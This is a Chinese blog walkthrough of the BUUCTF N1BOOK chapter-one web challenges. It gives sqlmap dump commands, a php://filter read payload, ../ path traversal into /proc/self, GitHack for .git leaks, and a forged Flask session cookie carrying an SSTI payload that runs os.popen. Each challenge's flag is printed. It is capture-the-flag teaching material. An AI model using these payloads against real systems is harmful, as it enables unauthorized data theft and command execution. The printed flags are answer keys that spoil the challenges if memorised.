【BUUCTF N1BOOK】[第一章 web入门] 通关

 博主介绍

‍ 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~
✨主攻领域：【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
点赞➕评论➕收藏 == 养成习惯（一键三连）
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限，欢迎各位大佬指点，相互学习进步！

---

目录

前言

[第一章 web入门]常见的搜集

robots.txt有flag1

index.php~有flag2

.index.php.swp有flag3

[第一章 web入门]SQL注入-1

sqlmap一把梭

[第一章 web入门]afr_1

php伪协议

[第一章 web入门]afr_2

目录穿越，文件读取

[第一章 web入门]粗心的小李

1.下载GitHack

2..git/泄漏

[第一章 web入门]afr_3

---

前言

N1BOOK是Nu1L Team为方便读者打造的免费平台，读者可在上面享受书籍相关资源以及查阅勘误。

[第一章 web入门]常见的搜集

n1book{info_1s_v3ry_imp0rtant_hack}

这里提示敏感文件，这里使用御剑扫描不到目录

我这里使用dirsearch扫描网站目录:

┌──(rootkali)-[~]
└─# dirsearch -u http://9fa5191e-fbba-4744-bff4-6f7a789577b3.node5.buuoj.cn:81/ -e*

-e* 参数，通常来说，它应该被替换为具体的文件扩展名，以便进行目标网站的有针对性扫描 

robots.txt有flag1

flag1:n1book{info_1

index.php~有flag2

flag2:s_v3ry_im

.index.php.swp有flag3

flag3:p0rtant_hack}

拼接起来，flag是：n1book{info_1s_v3ry_imp0rtant_hack}

[第一章 web入门]SQL注入-1

n1book{union_select_is_so_cool}

这里我给大家搞好了闭合点，这个很简单，通过简单的判断就可以出来

sqlmap一把梭

感兴趣的小伙伴们可以尝试下利用手工联合注入，我这里直接利用sqlmap跑

sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" --dbs --batch   ##跑库

sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" -D note --tables --batch      ##跑表

sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" -D note -T fl4g --columns --batch    ##跑列

sqlmap -u "http://55d95487-415f-4693-9101-e6abda4bbb48.node5.buuoj.cn:81/index.php?id=1" -D note -T fl4g -C 'fllllag' --dump  --batch   ##跑字段

[第一章 web入门]afr_1

http://cba81709-c243-48c4-b593-837760ff0de5.node5.buuoj.cn:81/

n1book{afr_1_solved}

php伪协议

直接利用php伪协议读取flag

?p=php://filter/convert.base64-encode/resource=flag

[第一章 web入门]afr_2

n1book{afr_2_solved}

http://e1003d70-123f-4635-8946-a3674a107066.node5.buuoj.cn:81/

右击查看网页源代码，发现有个/img目录

目录穿越，文件读取

[第一章 web入门]粗心的小李

n1book{git_looks_s0_easyfun}

1.下载GitHack

GitCode - 开发者的代码家园https://gitcode.com/lijiejie/githack/overview?utm_source=csdn_github_accelerator&isLogin=1

2..git/泄漏

python GitHack.py http://b376ab2f-a56f-49fe-8887-b0275fba45a1.node5.buuoj.cn:81/.git/

会生成一个index.html文件，打开就可以拿到flag了

[第一章 web入门]afr_3

n1book{afr_3_solved}

提交一个123上去

然后查看文章，发现url有传参

随便输入一个123，发现这里可能存在目录穿越或者文件包含漏洞

发现一个server.py文件

http://f70723e8-84fa-4861-b580-63657fa57ec5.node5.buuoj.cn:81/article?name=../../../../../proc/self/cmdline

在 Linux 系统中，/proc/self/cmdline 是一个特殊的文件，它包含了当前进程的命令行参数。通过读取这个文件，可以获取当前进程的命令行参数。

http://f70723e8-84fa-4861-b580-63657fa57ec5.node5.buuoj.cn:81/article?name=../../../../../proc/self/cwd/server.py

这里发现flag.py和key.py

flag.py不允许访问

#!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'

在 Linux 中，/proc/self/cwd/ 是一个特殊的符号链接，它指向当前进程的当前工作目录。通过将 ../../../../../proc/self/cwd/key.py 附加到网站的地址中，你尝试获取当前工作目录下的 key.py 文件。

根据你提供的信息，得到的文件内容是 #!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'。这个文件内容表示是一个以 Python 编写的脚本，定义了一个名为 key 的变量，并给它赋了 'Drmhze6EPcv0fN_81Bj-nA' 这个字符串值。

加密脚本的获取方式：

 git clone https://github.com/noraj/flask-session-cookie-manager

┌──(rootkali)-[~/桌面/flask-session-cookie-manager]
└─# python3 flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"
.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.Zb9oCQ.Nn27TDkaahhdaRVZ6bm4ktrMcpI

当我们使用脚本得到session时，我们需要抓包，进行伪造cookie，得到flag

.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.Zb9oCQ.Nn27TDkaahhdaRVZ6bm4ktrMcpI